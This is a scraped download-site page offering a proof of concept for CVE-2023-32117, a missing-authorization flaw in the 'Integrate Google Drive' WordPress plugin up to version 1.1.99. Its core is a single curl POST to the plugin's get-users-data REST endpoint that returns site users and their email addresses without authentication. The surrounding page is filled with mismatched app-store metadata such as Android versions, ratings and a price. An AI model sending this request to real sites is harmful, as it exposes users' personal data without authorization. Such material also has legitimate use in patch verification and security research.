CVE-2023-32117 Exploit Poc

CVE-2023-32117 Exploit Poc

vReadme by Prapattimynk

Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API EndpointsPOCGet list of users and email adddress.curl -i -s -k -X $'POST' \ -H $'Host: wordpress.lan' -H $'User-Agent: Mozilla/

Android Android 5.0Exploits And POCs
( 598 ratings )
Price: $0
File CVE-2023-32117 Exploit Poc
Publisher Prapattimynk
Genre Exploits And POCs
File Type Readme
Os Wordpress
Mod Version Readme
Report Report
CVE-2023-32117 Exploit Poc is the most famous version in the CVE-2023-32117 Exploit Poc series of publisher

Integrate Google Drive <= 1.1.99 – Missing Authorization via REST API Endpoints


Get list of users and email adddress.

curl -i -s -k -X $’POST’ \ -H $’Host: wordpress.lan’ -H $’User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0′ -H $’Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8′ -H $’Accept-Language: en-US,en;q=0.5′ -H $’Accept-Encoding: gzip, deflate’ -H $’Connection: close’ -H $’Upgrade-Insecure-Requests: 1′ -H $’Content-Type: application/x-www-form-urlencoded’ -H $’Content-Length: 0′ \ $’http://wordpress.lan/wp-json/igd/v1/get-users-data’

Recommended for You

You may also like


Your email address will not be published. Required fields are marked *

Next Post X
Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.